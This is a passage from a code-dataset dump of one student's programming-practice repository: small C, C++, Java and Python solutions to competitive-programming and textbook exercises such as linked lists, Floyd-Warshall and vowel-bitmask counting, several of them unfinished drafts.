"Teja-09/Programming", "src_encoding": "UTF-8", "text": "import java.util.*;\n \nclass bank {\n \n\tpublic static void main(String[] args) {\n\t\t\n\t\t\n\t\tfloat x,y;\n\t\tScanner sc = new Scanner(System.in);\n\t\t\n \n\t\tx =sc.nextFloat();\n\t\ty=sc.nextFloat();\n\t\n\t\tif(x%5!=0 || (x+0.50)>y)\n\t\t\tSystem.out.printf(\"%f\", y);\n\t\telse {\n\t\t\ty-=(x+0.50);\n\t\t\tSystem.out.printf(\"%f\", y);}\n\t}} " }, { "alpha_fraction": 0.3353884220123291, "alphanum_fraction": 0.3637484610080719, "avg_line_length": 12.096774101257324, "blob_id": "fe1f4b04cc21862251fd5ffe1c148cf0849827db", "content_id": "bab735ecd730c7d818fc2caf8d4cf679b67f69d4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 811, "license_type": "permissive", "max_line_length": 51, "num_lines": 62, "path": "/C++/CFMM.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tios_base::sync_with_stdio(false);\n cin.tie(NULL);\n\tint t,n,i,j;\n\tstring s;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tvector< int >a(6,0);\n\t\tint cc =0, co = 0, cd = 0, ce = 0, ch = 0,cf = 0;\n\t\tcin >> n;\n\t\tfor(j=0;j<n;j++)\n\t\t{\n\t\t\tcin >> s;\n\t\t\tfor(i=0;i<s.size();i++)\n\t\t\t{\n\t\t\t\tswitch(s[i])\n\t\t\t\t{\n\t\t\t\t\tcase 'c':\n\t\t\t\t\t\t++cc;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t\n\t\t\t\t\tcase 
'o':\n\t\t\t\t\t\t++co;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tcase 'd':\n\t\t\t\t\t\t\t++cd;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t\n\t\t\t\t\tcase 'e':\n\t\t\t\t\t\t\t++ce;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t\n\t\t\t\t\tcase 'h':\n\t\t\t\t\t\t\t++ch;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\t\n\t\t\t\t\tcase 'f':\n\t\t\t\t\t\t++cf;\n\t\t\t\t\t\tbreak;\t\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\ta[0] = cc;\n\t\ta[1] = co;\n\t\ta[2] = cd;\n\t\ta[3] = ce;\n\t\ta[4] = ch;\n\t\ta[5] = cf;\n\t\ta[0] = a[0]/2;\n\t\ta[3] = a[3]/2;\n\t\tsort(a.begin(),a.end());\n\t\tcout << a[0] << \"\\n\";\n\t\t\n\t}\n}" }, { "alpha_fraction": 0.4882400631904602, "alphanum_fraction": 0.4971613883972168, "avg_line_length": 12.106383323669434, "blob_id": "599acc803980b379cc2d8260027ba4eb25aaf5e7", "content_id": "81c6fd8cf85d788f824b71e71fba88cd8c27f487", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1233, "license_type": "permissive", "max_line_length": 45, "num_lines": 94, "path": "/C++/Linkedlist/full linkedlist.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\tint data;\n\tNode* next;\n\tNode(int data)\n\t{\n\t\tthis->data = data;\n\t\tnext = NULL;\n\t}\n};\n\nclass Linkedlist\n{\n\tpublic:\n\t\tNode* head;\n\t\tNode* tail;\n\t\tint len;\n\t\tLinkedlist()\n\t\t{\n\t\t\thead = NULL;\n\t\t\ttail = NULL;\n\t\t\tlen = 0;\n\t\t}\n\t\t\n\t\tvoid push(int data)\n\t\t{\n\t\t\tNode* new_node = new Node(data);\n\t\t\tnew_node->next = head;\n\t\t\thead = new_node;\n\t\t\t++len;\n\t\t}\n\t\n\t\tvoid append(int data)\n\t\t{\n\t\t\tNode* new_node = new Node(data);\n\t\t\tif(len == 0)\n\t\t\t{\n\t\t\t\thead = new_node;\n\t\t\t\ttail = new_node;\n\t\t\t\thead->next = NULL;\n\t\t\t\t++len;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\ttail->next = new_node;\n\t\t\t\tnew_node->next = NULL;\n\t\t\t\ttail = new_node;\n\t\t\t\t++len;\n\t\t\t}\n\t\t}\n\t\t\n\t\tvoid printlist()\n\t\t{\n\t\t\tNode* temp = head;\n\t\t\twhile(temp != NULL)\n\t\t\t{\n\t\t\t\tcout << temp->data << \" -> \";\n\t\t\t\ttemp = temp->next;\n\t\t\t}\n\t\t\tcout << \"\\n\";\n\t\t}\n};\n\nint main()\n{\n\tLinkedlist* li = new Linkedlist();\n\tchar c;\n\tcout << \"a - append at the back \" << \"\\n\";\n\tcout << \"p - push from the front \" << \"\\n\"; \n\tcin >> c;\n\tif(c == 'p')\n\t{\n\t\tli->push(2);\n\t\tli->push(8);\n\t\tli->push(10);\n\t\tli->push(1);\n\t\t\n\t\tli->printlist();\n\t}\n\telse if(c == 'a')\n\t{\n\t\tli->append(2);\n\t\tli->append(4);\n\t\tli->append(6);\n\t\tli->append(9);\n\t\t\n\t\tli->printlist();\n\t}\n\n}\n\n" }, { "alpha_fraction": 0.4451901614665985, "alphanum_fraction": 0.48769575357437134, "avg_line_length": 16.625, "blob_id": "ba845b0c2abdeeb5e34a5073bc329616e4c1e796", "content_id": "bbe1a57145f3c4e719359d258f0b30cc26492a86", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 447, "license_type": "permissive", "max_line_length": 35, "num_lines": 24, "path": "/python/HPOJ/Ex-5/Aman and lab file work.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 20 15:06:01 2020\n\n@author: teja\n\"\"\"\n\nn = int(input())\nt = []\nd = []\nans = []\nfor i in range(n):\n temp = list(input().split())\n t.append(temp[0])\n d.append(temp[1])\nfor i in range(len(t)): \n minval = min(t)\n minind = t.index(minval)\n ans.append()\n for i in range(minind):\n 
t.append(t.pop(0))\n d.append(d.pop(0))\n t.pop(0)\n d.pop(0)\n \n\n \n \n " }, { "alpha_fraction": 0.42670536041259766, "alphanum_fraction": 0.4542815685272217, "avg_line_length": 21.066667556762695, "blob_id": "8bc41befe81c867e6739e54030f6d19c65c7bde6", "content_id": "78924ef8eb8b308b6e4ea4e96eebda0a1a049775", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "permissive", "max_line_length": 57, "num_lines": 30, "path": "/python/HPOJ/Ex-5/HPOJ Book Exercises.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 20 14:14:26 2020\n\n@author: teja\n\"\"\"\n\nn = int(input())\nval = []\nsub = []\nfor i in range(n):\n temp = list(input().split())\n #print(temp)\n if(int(temp[0]) != -1):\n val.append(int(temp[0]))\n sub.append(temp[1])\n #print(val)\n #print(sub)\n else:\n minval = min(val)\n minind = val.index(minval)\n leng = len(val)\n #print(minind)\n subneed = \"\"\n for j in range(len(val), minind, -1):\n #val.pop()\n subneed = sub.pop()\n val.pop()\n #print(subneed)\n print(str(leng - minind -1) + \" \" + str(subneed))\n \n \n \n " }, { "alpha_fraction": 0.4041237235069275, "alphanum_fraction": 0.4329896867275238, "avg_line_length": 11.75, "blob_id": "b10d33086d563885d97bf76344d8ec2912b1537e", "content_id": "3d377d6843fd9e65c137b9c8940e81a161b6b79a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 970, "license_type": "permissive", "max_line_length": 73, "num_lines": 76, "path": "/April Long_2020/Squared Subsequences_BruteForce.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint checksum(int i, int j, vector<int> vec, int prev, vector<int>&lenval)\n{\n\tint sum = 0, it;\n\tif(i == 1)\n\t{\n\t\tsum = vec[j];\n\t\tif(j == 0)\n\t\t{\n\t\t\tlenval[i-1] = sum;\t\n\t\t}\n\t}\n\telse if(j == 0)\n\t{\n\t\tsum = lenval[i-1-1] + vec[i-1];\n\t\tlenval[i-1] = sum;\n\t}\n\telse\n\t{\n\t\tif(vec[i+j-1] == 0)\n\t\t{\n\t\t\treturn (prev - vec[j-1]);\n\t\t}\n\t\telse \n\t\t{\n\t\t\treturn (prev + vec[i+j-1] - vec[j-1]);\n\t\t}\n\t}\n\n\treturn sum;\n}\n\nint main()\n{\n\tint t, n, i, j,temp;\n\tcin >> t; \n\twhile(t--)\n\t{\n\t\tint ans = 0;\n\t\tcin >> n;\n\t\tvector<int>vec(n);\n\t\tvector<int>lenval(n);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> temp;\n\t\t\tif(temp % 4 == 0)\n\t\t\t{\n\t\t\t\tvec[i] = 2;\n\t\t\t}\n\t\t\telse if(temp%2 != 0)\n\t\t\t{\n\t\t\t\tvec[i] = 0;\t\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tvec[i] = 1;\n\t\t\t}\n\t\t}\n\t\tint ret = 0, prev = 0;\n\t\tfor(i=1;i<=n;i++)\t\n\t\t{\n\t\t\tfor(j=0;j<=n-i;j++)\n\t\t\t{\n\t\t\t\tret = checksum(i, j, vec, prev, lenval);\n\t\t\t\tprev = ret;\n\t\t\t\tif(ret != 1)\n\t\t\t\t{\n\t\t\t\t\t++ans;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tcout << ans << \"\\n\";\n\t}\n}\n\n" }, { "alpha_fraction": 0.43127962946891785, "alphanum_fraction": 0.44549763202667236, "avg_line_length": 13.066666603088379, "blob_id": "149a59a9c11472cde1f37779d7fecec4067aafa8", "content_id": "978929652a9397c2c63656b9e35f0d51e05c5069", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 211, "license_type": "permissive", "max_line_length": 23, "num_lines": 15, "path": "/C/INTEST.c", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n\tint main(){\n\t\tint n,i,count=0;\n\t\tint k;\n\t\tscanf(\"%d 
%d\",&n,&k);\n\t\tint arr[n];\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tscanf(\"%d\",&arr[i]);\n\t\t\tif(arr[i]%k==0){\n\t\t\t\t++count;\n\t\t\t}\n\t\t}\n\t\tprintf(\"%d\",count);\n\t}\n" }, { "alpha_fraction": 0.5216346383094788, "alphanum_fraction": 0.5336538553237915, "avg_line_length": 17.863636016845703, "blob_id": "6e7e4d079312e95757478885c25fe02b3f2217c8", "content_id": "562363d1616f433e5126de5d62257ae5155850c7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 416, "license_type": "permissive", "max_line_length": 41, "num_lines": 22, "path": "/Java/MAGICJAR.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "\nimport java.util.*;\nimport java.math.*;\nclass interactiveProblen {\n\tpublic static void main(String[] args) {\n\t\tScanner sc = new Scanner(System.in);\n\t\tint t;\n\t\tt= sc.nextInt();\n\t\twhile(t-- != 0)\n\t\t{\n\t\t\tint n,i;\n\t\t\tlong count = 0;\n\t\t\tn = sc.nextInt();\n\t\t\tlong [] a = new long[n];\n\t\t\tfor(i = 0 ; i< n ; i++)\n\t\t\t{\n\t\t\t\ta[i] = sc.nextLong();\n\t\t\t\tcount = count + (a[i] - 1);\n\t\t\t}\n\t\t\tSystem.out.println(count+1);\n\t\t}\t\t\n}\n}\n" }, { "alpha_fraction": 0.27283236384391785, "alphanum_fraction": 0.342196524143219, "avg_line_length": 13.180327415466309, "blob_id": "8649788f6e781e08bbac07e3f0771ff295e1cf85", "content_id": "1ad94df3eedd34a67ad839e3b08f9d86316087e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 865, "license_type": "permissive", "max_line_length": 70, "num_lines": 61, "path": "/C++/DP/max sqr matrix in a given matrix.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nvoid printMaxSubSquare( int m[6][5])\n{\n\tint ans[6][5];\n\tint i,j;\n\tfor(i=0;i<6;i++)\n\t{\n\t\tans[i][0] = m[i][0];\n\t}\n\tfor(i=0;i<5;i++)\n\t{\n\t\tans[0][i] = m[0][i];\n\t}\n\t\n\t\n\tfor(i=1;i<6;i++)\n\t{\n\t\tfor(j=1;j<5;j++)\n\t\t{\n\t\t\tif(m[i][j] == 1)\n\t\t\t{\n\t\t\t\tans[i][j] = 1 + min(ans[i][j-1], min(ans[i-1][j], ans[i-1][j-1]));\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tans[i][j] = 0;\n\t\t\t}\n\t\t}\n\t}\n\t\n\tint size = 0;\n\t\n\tfor(i=0;i<6;i++)\n\t{\n\t\tfor(j=0;j<5;j++)\n\t\t{\tcout << ans[i][j] << \"\\t\";\n\t\t\tif(size < ans[i][j])\n\t\t\t{\n\t\t\t\tsize = ans[i][j];\n\t\t\t}\n\t\t}\n\t\tcout << \"\\n\";\n\t}\n\t\n\tcout << size;\n}\n\n\nint main()\n{\n\t int M[6][5] = {{0, 1, 1, 0, 1}, \n {1, 1, 0, 1, 0}, \n {0, 1, 1, 1, 0}, \n {1, 1, 1, 1, 0}, \n {1, 1, 1, 1, 1}, \n {0, 0, 0, 0, 0}}; \n \n printMaxSubSquare(M);\n}\n" }, { "alpha_fraction": 0.3921568691730499, "alphanum_fraction": 0.40392157435417175, "avg_line_length": 10.590909004211426, "blob_id": "71d906cd41a6053a6ec1eff527dde1df6db2e778", "content_id": "d45e09f40060d7a701fdb198e331a3d22f2a9436", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 255, "license_type": "permissive", "max_line_length": 23, "num_lines": 22, "path": "/C++/Non-zero.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t, n, i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tvector< int >a(n);\n\t\tfor(i=0; i<n; i++)\n\t\t{\n\t\t\tcin >> a[i];\n\t\t}\n\t\tint sum = 0;\n\t\tfor(i=0; i<n; i++)\n\t\t{\n\t\t\tif(a[i] > )\n\t\t}\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t}\n}\n" }, { "alpha_fraction": 0.4748201370239258, "alphanum_fraction": 
0.5179855823516846, "avg_line_length": 10.416666984558105, "blob_id": "cedae41d22aef770b48bc4e2d054d647d15741a9", "content_id": "6a4e66e9f91301bfe9678f26d71f62a90334d1cb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 139, "license_type": "permissive", "max_line_length": 23, "num_lines": 12, "path": "/C++/pointer test.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint a = 10;\n\tcout << a << \"\\n\";\n\tint* ptr = &a;\n\t*ptr = 100;\n\t\t\n\treturn 0;\n}\n\n\n" }, { "alpha_fraction": 0.49642857909202576, "alphanum_fraction": 0.5214285850524902, "avg_line_length": 19.01785659790039, "blob_id": "51108c45b53a9096260afc46848fc4e20127518b", "content_id": "5a33190210299f3f97f849cb8c58be8c97f471ae", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1120, "license_type": "permissive", "max_line_length": 40, "num_lines": 56, "path": "/python/Linkedlist/linklist creation.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 15 15:27:51 2019\n\n@author: teja\n\"\"\"\n\nclass Node:\n def __init__(self, new_data):\n self.data = new_data\n self.next = None\n\nclass Linkedlist:\n def __init__(self):\n self.head = None\n self.tail = None\n self.len = 0\n \n def push(self, data):\n new_node = Node(data)\n new_node.next = self.head\n self.head = new_node\n \n def append(self,data):\n new_node = Node(data)\n if self.len == 0:\n new_node.next = None\n self.head = new_node\n self.tail = new_node\n self.len = self.len + 1\n else:\n self.tail.next = new_node\n self.tail = new_node\n new_node.next = None\n \n def printlist(self):\n temp = self.head\n while(temp):\n print(temp.data, end=' -> ')\n temp = temp.next\n\n\n\nllist = Linkedlist()\n#llist.push(20)\n#llist.push(2)\n#llist.push(1)\n#llist.push(5)\n#llist.push(9)\n\nllist.append(20)\nllist.append(2)\nllist.append(1)\nllist.append(5)\nllist.append(9)\nllist.printlist()" }, { "alpha_fraction": 0.421658992767334, "alphanum_fraction": 0.44930875301361084, "avg_line_length": 15.358490943908691, "blob_id": "fa91ac52cca07b19e09366f32d30f0310f65bde9", "content_id": "0519641eaf8936083378b2d12347d277c3efd24a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 868, "license_type": "permissive", "max_line_length": 44, "num_lines": 53, "path": "/Java/CHEFING.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "\nimport java.util.*;\nimport java.math.*;\n class interactiveProblen {\n\tpublic static void main(String[] args) {\n\t\tScanner sc = new Scanner(System.in);\n\t\tint t;\n\t\tt= sc.nextInt();\n\t\twhile(t-- != 0)\n\t\t{\n\t\t\tint n,i,j,k,count =0 ;\n\t\t\tn = sc.nextInt();\n\t\t\tString[] s = new String[n];\n\t\t\tint[] flag = new int[26];\n\t\t\tint[] count1 = new int[26];\n\t\t\ts[0] = sc.nextLine();\n\t\t\tfor(i=0;i<n;i++)\n\t\t\t{\n\t\t\t\ts[i] = sc.nextLine();\n\t\t\t}\n\t\t\tfor(i=0;i<n;i++)\n\t\t\t{\n\t\t\t\tfor(j=0;j<s[i].length();j++)\n\t\t\t\t{\n\t\t\t\t\tint a = (int)s[i].charAt(j) - (int)'a';\n\t\t\t\t\t//System.out.println(\"a value is \"+a );\n\t\t\t\t\tif(flag[a] == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tcount1[a] = count1[a] + 1;\n\t\t\t\t\t\tflag[a] = 1;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tfor(k=0;k<26;k++)\n\t\t\t\t{\n\t\t\t\t\tflag[k] = 
0;\n\t\t\t\t}\n\t\t\t}\n\t\t\tfor(i=0;i<26;i++)\n\t\t\t{\n\t\t\t\tif(count1[i] == n)\n\t\t\t\t{\n\t\t\t\t\t++count;\n\t\t\t\t}\n\t\t\t}\n\t\t\tSystem.out.println(count);\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t}\t\t\n}\n}\n" }, { "alpha_fraction": 0.37080636620521545, "alphanum_fraction": 0.4102413058280945, "avg_line_length": 13.756522178649902, "blob_id": "09aacafed0c7c1f6bfb32cb69776f45213c395b8", "content_id": "9110b2d688c1b5aa1d243ad48514372afcf52854", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1699, "license_type": "permissive", "max_line_length": 67, "num_lines": 115, "path": "/April Long_2020/Squared Squences_Optimized.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nlong long findsum(long long index, long long length, long long odd)\n{\n\tif(odd == 0)\n\t{\n\t\tif(index <= (length/2))\n\t\t{\n\t\t\treturn ((index) * ((2*length) + (index-1) * -2))/2;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tindex = length - index + 1;\n\t\t\treturn ((index) * ((2*length) + (index-1) * -2))/2;\n\t\t}\n\t}\n\telse\n\t{\n\t\tif(index <= (length/2) + 1)\n\t\t{\n\t\t\treturn ((index) * ((2*length) + (index-1) * -2))/2;\n\t\t}\n\t\telse\n\t\t{\n\t\t\tindex = length - index + 1;\n\t\t\treturn ((index) * ((2*length) + (index-1) * -2))/2;\n\t\t}\n\t}\n}\n\nint main()\n{\n\tlong long t, n, i, j;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tvector<long long>ele(n);\n\t\tvector<long long>div2;\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> ele[i];\n\t\t\tif(ele[i] % 2 == 0)\n\t\t\t{\n\t\t\t\tdiv2.push_back(i+1);\n\t\t\t}\n\t\t}\n\t\tlong long fi = (n * (n+1)) / 2;\n\t\tlong long s = div2.size(), sub = 0;\n\t\tlong long l = 1, r = n;\n\t\tlong long odd = 0;\n\n\t\tlong long len , ret;\n\t\tfor(i=0;i<s;i++)\n\t\t{\n\t\t\tif(ele[div2[i]-1] % 4 == 0)\n\t\t\t{\n\t\t\t\tl = div2[i]+1;\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tif(i == s-1)\n\t\t\t{\n\t\t\t\tr = ele.size();\n\t\t\t\tlen = r - l +1;\n\t\t\t\tif(len%2 != 0)\n\t\t\t\t{\n\t\t\t\t\todd = 1;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\todd = 0;\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tif(div2[i] == l || div2[i] == r)\n\t\t\t\t{\n\t\t\t\t\tret = len;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tret = findsum(div2[i] - l + 1, len, odd);\t\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tsub = sub + ret;\n\t\t\t\tl = div2[i] + 1;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tr = div2[i+1] - 1;\n\t\t\t\tlen = r - l +1;\n\t\t\t\tif(len%2 != 0)\n\t\t\t\t{\n\t\t\t\t\todd = 1;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\todd = 0;\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tif(div2[i] == l || div2[i] == r)\n\t\t\t\t{\n\t\t\t\t\tret = len;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tret = findsum(div2[i] - l + 1, len, odd);\t\n\t\t\t\t}\n\t\t\t\tsub = sub + ret;\n\t\t\t\tl = div2[i] + 1;\n\t\t\t}\n\n\t\t}\n\t\tcout << fi - sub << \"\\n\";\n\t}\n}\n\n\n" }, { "alpha_fraction": 0.6005089282989502, "alphanum_fraction": 0.6386768221855164, "avg_line_length": 22.176469802856445, "blob_id": "97a6c0ac700b78d62efc216586b56cdfb33123b7", "content_id": "abc9f9c811b2914ae6f3e176cb6069a20f13baa1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 393, "license_type": "permissive", "max_line_length": 107, "num_lines": 17, "path": "/python/CIR Ques.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 9 17:44:54 2020\n\n@author: 
teja\n\"\"\"\n\nex_str = \"God has created the universe so beautiful that the description of it can be represented in lisp.\"\nex_str = ex_str[:-1]\n\nprint(ex_str)\n\nex_list = list(map(lambda x: x.lower(), ex_str.split()))\nex_list.sort(key=lambda x: len(x))\nex_list[0] = ex_list[0].title()\nres = \" \".join(ex_list) + \".\"\nprint(res)" }, { "alpha_fraction": 0.38730451464653015, "alphanum_fraction": 0.41030359268188477, "avg_line_length": 14.768115997314453, "blob_id": "edcea530e61ece6da2b8cc0251717cf8cbf7868b", "content_id": "2cac1a9f2d8a5d3824a34c2f5d374e8da56808f4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1087, "license_type": "permissive", "max_line_length": 52, "num_lines": 69, "path": "/C++/JAIN.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\t//ios_base::sync_with_stdio(false);\n\t//cin.tie(NULL);\n\t\n\tint t;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tlong n;\n\t\tlong i,j,k = 32;\n\t\tcin >> n;\n\t\tunsigned int tmp;\n\t\t//vector< unsigned long long > map(n,0);\n\t\tvector< long > bitcount(k,0);\n\t\tlong count = 0;\n\t\tstring s;\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> s;\n\t\t\tlong long len = s.length();\n\t\t\ttmp = 0;\n\t\t\tfor(j=0;j<len;j++)\n\t\t\t{\n\t\t\t\tswitch(s[j])\n\t\t\t\t{\n\t\t\t\t\tcase 'a': tmp = (tmp | 16);\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\t\n\t\t\t\t\tcase 'e': tmp = (tmp | 8);\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\t\n\t\t\t\t\tcase 'i': tmp = (tmp | 4);\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t\t\n\t\t\t\t\tcase 'o': tmp = (tmp | 2);\n\t\t\t\t\t\t\t\tbreak;\n\t\t\n\t\t\t\t\tcase 'u': tmp = (tmp | 1);\n\t\t\t\t\t\t\t\tbreak;\t\t\t\t\n\t\t\t\t}\t\n\t\t\t}\n\t\t\t++bitcount[tmp];\n\t\t}\n\t\t\n\t\tlong long res = 0;\n\t\tfor(i=0;i<32;i++)\n\t\t{\n\t\t\tfor(j=0;j<32;j++)\n\t\t\t{\n\t\t\t\tif((i | j) == 31)\n\t\t\t\t{\n\t\t\t\t\t\n\t\t\t\t\tif(i == j)\n\t\t\t\t\t{\n\t\t\t\t\t\tres = res + (bitcount[i] * (bitcount[i] - 1));\n\t\t\t\t\t\tcontinue;\n\t\t\t\t\t}\n\t\t\t\t\tres = res + (bitcount[i]*bitcount[j]);\n//\t\t\t\t\t\tcout << i << \" \" << j << \" \";\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tcout << (res/2) << \"\\n\";\n\t}\n}" }, { "alpha_fraction": 0.25473934412002563, "alphanum_fraction": 0.28080567717552185, "avg_line_length": 11.5820894241333, "blob_id": "8838c86c2bcd351d72dbf20cac9a477bc4a36551", "content_id": "f00f66440dc1ee9a3231afab38ba1e9e17a1d9cb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 844, "license_type": "permissive", "max_line_length": 51, "num_lines": 67, "path": "/April Long_2020/Unit GCD - version 3 - Efficient one.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t, n, count, i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tcount = 3;\n\t\tif(n < 3)\n\t\t{\n\t\t\tcount = n;\n\t\t}\n\t\tint days = n/2;\n\t\tif(days == 0)\n\t\t{\n\t\t\tdays = 1;\n\t\t}\n\t\tcout << days << \"\\n\";\n\t\tcout << count << \" \";\n\t\tif(n <= 3)\n\t\t{\n\t\t\tfor(i = 1;i<=n;i++)\n\t\t\t{\n\t\t\t\tcout << i << \" \";\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tif(n%2 != 0)\n\t\t\t{\n\t\t\t\tfor(i = 1;i<=3;i++)\n\t\t\t\t{\n\t\t\t\t\tcout << i << \" \";\n\t\t\t\t}\n\t\t\t\tcout << \"\\n\";\n\t\t\t\tfor(i=4;i<=n;i+=2)\n\t\t\t\t{\n\t\t\t\t\tcout << 2 << \" \" << i << \" \" << i+1 << 
\"\\n\";\n\t\t\t\t}\t\t\t\t\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tfor(i = 1;i<=3;i++)\n\t\t\t\t{\n\t\t\t\t\tcout << i << \" \";\n\t\t\t\t}\n\t\t\t\tcout << \"\\n\";\n\t\t\t\tfor(i=4;i<=n;i+=2)\n\t\t\t\t{\n\t\t\t\t\tif(i == n)\n\t\t\t\t\t{\n\t\t\t\t\t\tcout << 1 << \" \" << i << \"\\n\";\t\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tcout << 2 << \" \" << i << \" \" << i+1 << \"\\n\";\t\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t}\t\t\t\n\t\t\t}\n\t\t}\t\t\t\n\t}\n\n}\n\n" }, { "alpha_fraction": 0.46000000834465027, "alphanum_fraction": 0.4928571283817291, "avg_line_length": 13.5625, "blob_id": "59ac4e1eae4e7ad27633faabd2dc3f458462f6bf", "content_id": "dff10d85adb3d9bf8f9629d140b8fc58f4ca1067", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 700, "license_type": "permissive", "max_line_length": 64, "num_lines": 48, "path": "/C++/FlyodWarshall-AllPairShortestPath.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n#define max 99999\n#define siz 4\n\n\n//All pair shortest path\n//The final matrix shows the shortest dist from x node to y node\n// Complexity is n^3\n\nvoid floydWarshall(int matrix[][siz])\n{\n\tint i, j, k;\n\tfor(k = 0;k < siz; k++)\n\t{\n\t\tfor(i = 0; i < siz; i++)\n\t\t{\n\t\t\tfor(j = 0; j < 